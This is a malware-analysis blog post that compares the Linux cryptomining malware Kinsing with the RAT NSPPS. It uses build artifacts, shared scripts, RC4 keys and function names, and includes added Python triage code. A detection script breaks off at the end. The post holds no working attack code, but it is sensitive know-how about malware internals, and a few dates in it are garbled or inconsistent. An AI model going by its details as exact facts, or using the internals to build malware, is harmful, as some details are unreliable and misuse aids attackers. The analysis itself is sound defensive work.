{"id":8761,"date":"2024-12-21T13:00:28","date_gmt":"2024-12-21T10:00:28","guid":{"rendered":"https:\/\/sunucucozumleri.com\/blog\/?p=8761"},"modified":"2024-12-21T13:00:28","modified_gmt":"2024-12-21T10:00:28","slug":"kinsing-iki-yuzu-olan-kotu-amacli-yazilim","status":"publish","type":"post","link":"https:\/\/sunucucozumleri.com\/blog\/kinsing-iki-yuzu-olan-kotu-amacli-yazilim\/","title":{"rendered":"Kinsing: The Malware With Two Faces"},"content":{"rendered":"<h3><span class=\"ez-toc-section\" id=\"Kinsing_Nedir\"><\/span>What Is Kinsing?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Lately we have been busy researching the evolving landscape of cloud and container threats. Why focus here? Because as this technology becomes more popular and keeps maturing, attackers keep refining their techniques for breaking into these systems.<\/p>\n<p>During our research we came across <strong>Kinsing<\/strong>, an ELF malware involved in multiple attack campaigns, including ones targeting Redis and SaltStack. 
Kinsing is written in Go (also known as Golang), a relatively new language whose popularity among malware authors has grown quickly over the past few years.<\/p>\n<p>While analysing several Kinsing samples, we were surprised to find artifacts related to another malware family, <strong>NSPPS<\/strong>. At first we had several ideas that could explain these findings: perhaps the shared parts are open-source tools used by both families, or perhaps one group is imitating the other. What our research shows is that the two families are in fact one family, which the security research community has given two different names.<\/p>\n<p>In this post we examine the differences and similarities between Kinsing and NSPPS, present our findings, and explain how and why we concluded that they are the same malware family.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"NSPPS_ve_Kinsing_Arasindaki_Farklar\"><\/span><strong>Differences Between NSPPS and Kinsing<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>At the start of the research we collected all the IOCs published by security firms for detecting Kinsing and NSPPS, wrote our own YARA rules, and gathered the results. 
After some cleanup we had a few dozen samples to focus on.<\/p>\n<p>Of the 27 Kinsing and NSPPS samples, only one had been published as NSPPS: 5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6. The other 26 samples were classified as Kinsing.<\/p>\n<p>We found several notable artifacts that set the NSPPS sample apart from the Kinsing samples.<\/p>\n<p><strong><em>Versions and Dates: Let&#8217;s Compare the Numbers<\/em><\/strong><\/p>\n<p>First and foremost, the NSPPS sample was built with Go 1.9.7:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8762\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-1.png\" alt=\"\" width=\"970\" height=\"92\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-1.png 970w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-1-300x28.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-1-768x73.png 768w\" sizes=\"(max-width: 970px) 100vw, 970px\" \/><\/p>\n<p>The Kinsing samples were built with Go 1.13.4 or 1.13.6:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8763\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-2.webp\" alt=\"\" width=\"521\" height=\"46\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-2.webp 521w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-2-300x26.webp 300w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8764\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-3.webp\" alt=\"\" width=\"521\" height=\"48\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-3.webp 521w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-3-300x28.webp 300w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/p>\n<p>This difference suggests the samples were compiled at different times. It is only a hint, though: using the latest toolchain is sensible but not required, so the Go version by itself does not date a build.<\/p>\n<p>Determining the build timestamp of the samples was important for telling the two families apart. Unfortunately, unlike Windows PE files, Linux ELF files have no build timestamp by design, which leaves us with one more missing piece of information. Fortunately, Go malware (or, more generally, any Go binary) by default carries references to the GitHub packages it uses, usually together with a version number. 
This lets us establish a lower bound for the build date of the malware: the binary cannot have been compiled before the release date of the newest package it uses.<\/p>\n<p>Below is a partial list of packages common to the Kinsing samples, with their release dates:<\/p>\n<table class=\"table table-bordered table-striped table-responsive-stack\" style=\"height: 341px;\" width=\"801\">\n<thead>\n<tr>\n<th width=\"33%\">Package<\/th>\n<th width=\"33%\">Version<\/th>\n<th width=\"33%\">Release Date (DD\/MM\/YYYY)<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>go-resty\/resty<\/td>\n<td>2.1.0<\/td>\n<td>10\/10\/2019<\/td>\n<\/tr>\n<tr>\n<td>google\/btree<\/td>\n<td>1.0.0<\/td>\n<td>13\/08\/2018<\/td>\n<\/tr>\n<tr>\n<td>kelseyhightower\/envconfig<\/td>\n<td>1.4.0<\/td>\n<td>24\/05\/2019<\/td>\n<\/tr>\n<tr>\n<td>markbates\/pkger<\/td>\n<td>0.12.8<\/td>\n<td>21\/11\/2019<\/td>\n<\/tr>\n<tr>\n<td>paulbellamy\/ratecounter<\/td>\n<td>0.2.0<\/td>\n<td>19\/07\/2017<\/td>\n<\/tr>\n<tr>\n<td>peterbourgon\/diskv<\/td>\n<td>2.0.1<\/td>\n<td>14\/08\/2017<\/td>\n<\/tr>\n<tr>\n<td>shirou\/gopsutil<\/td>\n<td>2.19.10<\/td>\n<td>19\/10\/2019<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>The release date of the <a class=\"ext-url\" href=\"https:\/\/github.com\/markbates\/pkger\" target=\"_blank\" rel=\"noopener nofollow\" data-internal=\"false\">pkger<\/a> version in use, the newest package in the list:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8765\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-1024x317.webp\" alt=\"\" width=\"1024\" height=\"317\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-1024x317.webp 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-300x93.webp 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-768x238.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4-1536x476.webp 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-4.webp 1658w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>We can therefore conclude that all 26 Kinsing samples were compiled after 21 November 2019.<\/p>\n<p>Below is a partial list of the packages used by NSPPS:<\/p>\n<table class=\"table table-bordered table-striped table-responsive-stack\" width=\"100%\">\n<thead>\n<tr>\n<th width=\"33%\">Package<\/th>\n<th width=\"33%\">Version<\/th>\n<th width=\"33%\">Release Date (DD\/MM\/YYYY)<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>google\/btree<\/td>\n<td>1.0.0<\/td>\n<td>13\/08\/2018<\/td>\n<\/tr>\n<tr>\n<td>go-resty\/resty<\/td>\n<td>2.1.0<\/td>\n<td>10\/10\/2019<\/td>\n<\/tr>\n<tr>\n<td>kelseyhightower\/envconfig<\/td>\n<td>1.4.0<\/td>\n<td>25\/05\/2019<\/td>\n<\/tr>\n<tr>\n<td>paulbellamy\/ratecounter<\/td>\n<td>0.2.0<\/td>\n<td>19\/07\/2017<\/td>\n<\/tr>\n<tr>\n<td>peterbourgon\/diskv<\/td>\n<td>3.0.0<\/td>\n<td>25\/04\/201<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>As can be seen, the earliest possible build date for NSPPS is 10 October 2019. 
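<\/p>\n<p>The dating argument above can be scripted. The following Python is an added example written for this post, not code from the original research: it pulls the Go toolchain version string and the module dependency records out of a binary blob, then returns the release date of the newest dependency as the earliest possible build date. The release-date table is copied from the tables above (<span class=\"cyb-inline-code-labs\">go-resty\/resty<\/span> is keyed by its v2 module path); the two byte strings are constructed stand-ins, not real sample bytes.<\/p>

```python
import re
from datetime import date

# Release dates as given in the tables of the post (DD/MM/YYYY there), keyed by
# module path and tagged version. Extend the table for the dependencies you meet.
RELEASE_DATES = {
    ("github.com/go-resty/resty/v2", "v2.1.0"): date(2019, 10, 10),
    ("github.com/google/btree", "v1.0.0"): date(2018, 8, 13),
    ("github.com/kelseyhightower/envconfig", "v1.4.0"): date(2019, 5, 24),
    ("github.com/markbates/pkger", "v0.12.8"): date(2019, 11, 21),
    ("github.com/paulbellamy/ratecounter", "v0.2.0"): date(2017, 7, 19),
    ("github.com/peterbourgon/diskv", "v2.0.1"): date(2017, 8, 14),
    ("github.com/shirou/gopsutil", "v2.19.10"): date(2019, 10, 19),
}

# runtime.buildVersion is stored as a plain string such as "go1.13.4".
GO_VERSION_RE = re.compile(rb"go1\.\d+(?:\.\d+)?")
# Module-built binaries (Go 1.11+) embed one "dep\t<module>\t<version>\t<sum>"
# record per dependency; "go version -m" prints the same records.
DEP_LINE_RE = re.compile(rb"^dep\t([^\t\n]+)\t(v[^\t\n]+)", re.M)
# Every Go binary keeps import paths inside its function names (pclntab), with or
# without module info and even when stripped; this recovers the GitHub ones.
IMPORT_PATH_RE = re.compile(rb"github\.com/[A-Za-z0-9_.-]+/[A-Za-z0-9_-]+")


def go_version(blob: bytes):
    m = GO_VERSION_RE.search(blob)
    return m.group(0).decode() if m else None


def dependencies(blob: bytes):
    return [(p.decode(), v.decode()) for p, v in DEP_LINE_RE.findall(blob)]


def import_paths(blob: bytes):
    return sorted({m.decode() for m in IMPORT_PATH_RE.findall(blob)})


def build_date_lower_bound(deps, release_dates=RELEASE_DATES):
    """The binary cannot predate the newest dependency it links. Returns that
    date (or None) and the dependencies whose release date is not in the table."""
    known = [release_dates[d] for d in deps if d in release_dates]
    unknown = [d for d in deps if d not in release_dates]
    return (max(known) if known else None, unknown)


def triage(blob: bytes):
    deps = dependencies(blob)
    not_before, unknown = build_date_lower_bound(deps)
    return {
        "go": go_version(blob),
        "deps": deps,
        "not_before": not_before.isoformat() if not_before else None,
        "unknown": unknown,
        "import_paths": import_paths(blob),
    }


# Constructed stand-ins, not real sample bytes: a Go 1.13 build with module info,
# as in the Kinsing samples, and a pre-modules Go 1.9.7 build, as in the NSPPS
# sample, which carries import paths but no version records.
KINSING_LIKE = (
    b"\x00go1.13.4\x00"
    b"path\tkinsing\nmod\tkinsing\t(devel)\t\n"
    b"dep\tgithub.com/go-resty/resty/v2\tv2.1.0\th1:placeholder\n"
    b"dep\tgithub.com/google/btree\tv1.0.0\th1:placeholder\n"
    b"dep\tgithub.com/markbates/pkger\tv0.12.8\th1:placeholder\n"
    b"dep\tgithub.com/shirou/gopsutil\tv2.19.10\th1:placeholder\n"
    b"\x00github.com/markbates/pkger.Open\x00main.masscan\x00"
)
NSPPS_LIKE = (
    b"\x00go1.9.7\x00"
    b"\x00github.com/google/btree.(*BTree).Get\x00"
    b"\x00github.com/peterbourgon/diskv.(*Diskv).Read\x00main.masscan\x00main.RC4\x00"
)

if __name__ == "__main__":
    for name, blob in (("kinsing-like", KINSING_LIKE), ("nspps-like", NSPPS_LIKE)):
        print(name, triage(blob))
```

<p>The same <span class=\"cyb-inline-code-labs\">dep<\/span> records are what <span class=\"cyb-inline-code-labs\">go version -m<\/span> prints for a module-built binary. For a pre-modules build such as the Go 1.9.7 NSPPS sample there are no version records, so the script only recovers import paths and the version has to be matched by hand, for example from package function names or strings that changed between releases. Either way the result is a lower bound, never a build date.<\/p>\n<p>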
That would suggest NSPPS was compiled before Kinsing, but both dates are only lower bounds, so this need not be the case.<\/p>\n<p><strong><em>To Be or Not to Be: That Is the Difference<\/em><\/strong><\/p>\n<p>An interesting artifact found in the Kinsing samples is the full text of William Shakespeare&#8217;s play Hamlet, as seen below:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8766\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-1024x706.webp\" alt=\"\" width=\"1024\" height=\"706\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-1024x706.webp 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-300x207.webp 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-768x530.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5-1536x1060.webp 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-5.webp 1638w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>This evidence had already been published by several researchers. The common assumption is that it is there to evade static detection engines, or to inflate the binary size, which serves the same purpose. This artifact is not present in the NSPPS sample.<\/p>\n<p>At first glance this looks like a significant difference: perhaps the Kinsing authors took more care to hide their malware than the NSPPS authors did. But digging a little deeper, we found another explanation. 
When we checked where the Hamlet text lives inside Kinsing, we found that rather than sitting in the data section among the binary&#8217;s other strings, it is referenced from code:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8767\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6-1024x152.webp\" alt=\"\" width=\"1024\" height=\"152\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6-1024x152.webp 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6-300x45.webp 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6-768x114.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-6.webp 1510w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>Let&#8217;s look at the relevant function:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8768\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-1024x499.png\" alt=\"\" width=\"1024\" height=\"499\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-1024x499.png 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-300x146.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-768x374.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7-1536x749.png 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-7.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>The function is named <span class=\"cyb-inline-code-labs\">github.com.markbates.pkger.internal.takeon.github.com.markbates.hepa.filters<\/span>, which reads as: &#8220;a function from the <span class=\"cyb-inline-code-labs\">filters<\/span> file of the <span class=\"cyb-inline-code-labs\">hepa<\/span> package written by <span class=\"cyb-inline-code-labs\">markbates<\/span> and published on GitHub, which has in turn been embedded (&#8216;taken on&#8217;) into the <span class=\"cyb-inline-code-labs\">pkger<\/span> package by the same author.&#8221;<\/p>\n<p>And, as expected:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8769\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-8.png\" alt=\"\" width=\"768\" height=\"240\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-8.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-8-300x94.png 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>(Be sure to check <a class=\"ext-url\" href=\"https:\/\/github.com\/markbates\/pkger\/tree\/v0.12.8\" target=\"_blank\" rel=\"noopener nofollow\" data-internal=\"false\">version 0.12.8<\/a>, because the author removed this code after that release.)<\/p>\n<p>While analysing the hepa package we understood the purpose of Hamlet: it is used to mask the sensitive parts of a buffer. Suppose, for example, that you want to upload your handy AWS script to GitHub to share your wisdom with the world, but you are not sure you removed every part that contains your secret AWS keys. In that case you can use a tool that automatically finds and strips credential-like data. 
Imagine how great it would be to replace your token with a powerful line from Hamlet!<\/p>\n<p>Now, as you have probably noticed, the pkger package is not listed among NSPPS&#8217;s packages, so the absence of Hamlet from NSPPS comes down to the absence of this one package, which is used as part of the crypto-mining activity (<em>more on that later<\/em>).<\/p>\n<p>So, whether or not Hamlet is considered a great and meaningful play, it is not meaningful evidence in our comparison. It is a side effect of other, more important elements.<\/p>\n<p><strong><em>Where Is the Money?<\/em><\/strong><\/p>\n<p>When you read the reports on the Kinsing samples it is clear that Kinsing&#8217;s purpose is to install a cryptominer named <span class=\"cyb-inline-code-labs\">kdevtmpfsi<\/span>, as shown in this diagram taken from Aqua Security:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8770\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-9.webp\" alt=\"\" width=\"768\" height=\"476\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-9.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-9-300x186.webp 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>Looking at the code of the Kinsing samples, we find many functions related to crypto-mining activity:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8771\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-10.webp\" alt=\"\" width=\"768\" height=\"358\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-10.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-10-300x140.webp 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>These functions are called from <span class=\"cyb-inline-code-labs\">main.main<\/span>, the real main function of the program.<\/p>\n<p>In the NSPPS sample, all the code related to crypto-mining activity, including the checks and the actions, is missing. This is a significant difference between the two tools: the crypto-mining functionality suggests that the purpose of the Kinsing malware is to install a cryptominer on the victim system, whereas the purpose of the NSPPS malware is to provide RAT functionality.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"NSPPS_ve_Kinsing_%E2%80%93_Benzerlikler\"><\/span><strong>NSPPS and Kinsing \u2013 Similarities<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Although we found several differences between Kinsing and NSPPS that make them look like entirely different malware families, a small voice reminds us that we promised to prove they belong to the same family. 
Below are some of those similarities.<\/p>\n<p><strong><em>Masscan for Everyone<\/em><\/strong><\/p>\n<p>A feature that recurs in all the samples is the use of the Masscan tool, and more specifically the use of Masscan in exactly the same way. Both the Kinsing and the NSPPS malware contain an embedded, plain-text bash script named <span class=\"cyb-inline-code-labs\">firewire.sh<\/span> that is executed by the <span class=\"cyb-inline-code-labs\">main.masscan<\/span> function. This function writes the script to disk, sets its mode to executable, and then runs it.<\/p>\n<p>See <strong>Appendix B<\/strong> for the full <span class=\"cyb-inline-code-labs\">firewire.sh<\/span> script.<\/p>\n<p>The code in <span class=\"cyb-inline-code-labs\">main.masscan<\/span> that handles this looks like this:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8772\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-1024x135.webp\" alt=\"\" width=\"1024\" height=\"135\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-1024x135.webp 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-300x39.webp 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-768x101.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11-1536x202.webp 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-11.webp 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>The <span class=\"cyb-inline-code-labs\">main.masscan<\/span> function in NSPPS is slightly different (probably because of the compiler version difference noted above) but contains the same <span class=\"cyb-inline-code-labs\">WriteFile -&gt; runcmd -&gt; newobject<\/span> sequence seen in Kinsing:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8773\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-1024x113.png\" alt=\"\" width=\"1024\" height=\"113\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-1024x113.png 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-300x33.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-768x84.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-1536x169.png 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12.png 2018w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>As far as our research shows, the firewire.sh script has never been made publicly available or released as an open-source tool, so we believe this piece of evidence is not merely a coincidence. It means there is a link between the authors of the two malware, or at least that they share resources.<\/p>\n<p><strong><em>Code Structure<\/em><\/strong><\/p>\n<p>When analysing NSPPS, it is striking how simple its code structure is. 
At the start of the program, NSPPS calls three initialisation functions and then enters an endless loop. The loop fetches a task from the C2 server (<span class=\"cyb-inline-code-labs\">getTask()<\/span>) and executes it (<span class=\"cyb-inline-code-labs\">doTask()<\/span>). Inside <span class=\"cyb-inline-code-labs\">doTask<\/span> the malware checks the string it received and then selects the right function to carry out the requested task.<\/p>\n<p>Surprisingly, when we analysed Kinsing we saw that it has the same structure apart from a few small changes. The main change is an additional initialisation function responsible for crypto-mining. There are also some minor changes in the inner functions inside the loop.<\/p>\n<p>For a demonstration, see the code snippets below:<\/p>\n<p>There are differences between individual Kinsing samples as well. 
For example, not all of them have the &#8220;redis_brute&#8221; functionality, and some have far fewer functions.<\/p>\n<p>Looking at the common structure we have just described, we think the relationship between the two families no longer looks like a coincidence or a casual imitation, but rather like collaboration between the authors, or even reuse of the same code.<\/p>\n<p><strong><em>Encryption, Encryption, Encryption<\/em><\/strong><\/p>\n<p>In its analysis of the NSPPS sample, IronNet included a YARA rule that looks for an RC4 key used by NSPPS. Using that rule and searching for this specific RC4 key, we found every Kinsing sample in our set as well as the NSPPS sample:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8774\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-1024x65.png\" alt=\"\" width=\"1024\" height=\"65\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-1024x65.png 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-300x19.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-768x49.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-1536x98.png 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13.png 1814w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p><em>Figure 14: Kinsing RC4 key<\/em><\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8775\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-1024x69.png\" alt=\"\" width=\"1024\" height=\"69\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-1024x69.png 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-300x20.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-768x52.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-1536x104.png 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14.png 1806w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>When we located the uses of this key by checking its XRefs, we could see that it is used through almost identical functions in both malware families.<\/p>\n<p>Usage in NSPPS:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8776\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-15.webp\" alt=\"\" width=\"768\" height=\"217\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-15.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-15-300x85.webp 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>Usage in Kinsing:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8777\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-16.png\" alt=\"\" width=\"768\" height=\"236\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-16.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-16-300x92.png 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>The only difference is the <span class=\"cyb-inline-code-labs\">getMinerPid<\/span> function, which is found only in the Kinsing samples because NSPPS lacks the crypto-mining functionality.<\/p>\n<p>Looking at the <span class=\"cyb-inline-code-labs\">main.RC4<\/span> function that implements RC4 in both malware, we see that the two implementations are practically identical. See the comparison below:<\/p>\n<p><strong><em>Function Names<\/em><\/strong><\/p>\n<p>After all this, the last thing we will show is the function list of these samples.<\/p>\n<p>Go binaries retain their source-code symbols, which works in our favour here because it makes the full list of original function names available. (This holds even for stripped Go binaries: the function names survive in the pclntab that the runtime needs for stack traces.) We have already discussed the packages used in the binaries, which bring their own functions, so now we are interested in the functions written by the malware author. These are identified by the <span class=\"cyb-inline-code-labs\">main<\/span> prefix, and they are the ones used in the next comparison.<\/p>\n<p>NSPPS has 63 such functions.<\/p>\n<p>The Kinsing samples differ slightly from one another. Let&#8217;s compare a random, previously published Kinsing sample: b70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f. 
This sample has only 59 functions (see <strong>Appendix C<\/strong> for the full function list of both samples).<\/p>\n<p>51 function names are common to both samples, which is roughly 83% of the function names of an average sample (81% of NSPPS's 63 and 86% of Kinsing's 59). Kinsing has eight unique function names and NSPPS has 12. Kinsing's unique functions are related to cryptomining (getMinerPid, isMinerRunning, minerRunningCheck, sendMinerPid), while NSPPS's unique functions are mostly RAT-related (backconnect, redisBrute, tcpTask and the HTTP and scan task workers). From this we learn that the bulk of the code is named identically, which means either that the same author wrote both samples or that one author copied from the other.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Cozum\"><\/span><strong>Conclusion<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>We have presented both NSPPS and Kinsing and discussed the differences between them: Golang versions, packages, the Hamlet play script and the cryptomining activity. We have also presented the similarities between the two families: the Masscan script named firewire.sh, the shared code structure, the RC4 key and the function names.<\/p>\n<p>All of the above indicates that both pieces of malware represent the same family. We believe the first version was compiled before November 2019, was named NSPPS and was used as a RAT. 
Later the malware was updated with some new packages (such as markbates\/pkger), new functions (cryptomining capabilities) and a new dose of Shakespearean inspiration, and it was named Kinsing by other security companies.<\/p>\n<p>Even though the purpose and use of the malware changed, as researchers we can still benefit from the similarities between the two: what we learned from the older version makes analysis and detection of the newer one much easier and faster.<\/p>\n<p><em><strong>A Note About Detection on VirusTotal<\/strong><\/em><\/p>\n<p>While writing signatures for some of the Kinsing artifacts and hunting for new samples, we found a few dozen files that clearly contain part of Kinsing's code but are damaged as executables and cannot run as proper ELF files. Closer inspection showed that these files are just a fragment of another sample, meaning that someone cut a sample and uploaded the piece to VirusTotal. 
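The truncated-upload problem described above, checked programmatically. This is an added example, not code from the original article or from CyberArk: it parses the ELF64 section header table with the Python standard library only and applies both the strict test (every section that occupies file bytes, and the section header table itself, must end inside the file) and the looser heuristic used by the YARA rule in Appendix A (the sum of the first eight section sizes must not exceed the file size). The ELF image it checks is constructed in memory for the demonstration; it is not a Kinsing sample, and its .bss sizes are chosen to show where the heuristic diverges from the strict test.

```python
"""Detect cut-off ELF files of the kind found on VirusTotal (added example, not from the article)."""
from __future__ import annotations

import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
ELFDATA2LSB = 1
SHT_PROGBITS = 1
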